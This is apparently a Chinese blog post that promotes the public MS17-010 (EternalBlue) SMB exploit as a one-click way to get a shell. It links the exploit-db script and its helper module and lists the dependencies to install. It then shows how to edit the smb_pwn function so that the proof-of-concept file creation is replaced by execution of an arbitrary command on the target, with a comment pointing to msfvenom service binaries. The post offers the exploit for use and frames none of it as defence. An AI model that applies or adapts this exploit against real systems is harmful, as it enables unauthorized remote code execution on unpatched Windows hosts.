神器之smb利用工具

推荐一款一直在用的smb漏洞利用工具（MS17-010）,个人认为十分好用，达到了一键getshell的效果。
https://www.exploit-db.com/exploits/42315/
还需要一个模块文件https://github.com/worawit/MS17-010/blob/master/mysmb.py
安装环境

pip install impacket
pip install pycrypto
error: Microsoft Visual C++ 9.0 is required(如果报此错，先安装vc++9 for python)
pip install pyasn1

稍微改下利用代码即可

def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()
    
    print('creating file c:\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/pwned.txt')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)
    
    #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
    #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is
    # executing binary generated by "msfvenom -f exe-service ..."

将默认的创建文件注释，改为直接执行命令即可

def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()
    
    #print('creating file c:\\pwned.txt on the target')
    #tid2 = smbConn.connectTree('C$')
    #fid2 = smbConn.createFile(tid2, '/pwned.txt')
    #smbConn.closeFile(tid2, fid2)
    #smbConn.disconnectTree(tid2)
    
    #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
    service_exec(conn, r'cmd /c xxxxxx')
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is
    # executing binary generated by "msfvenom -f exe-service ..."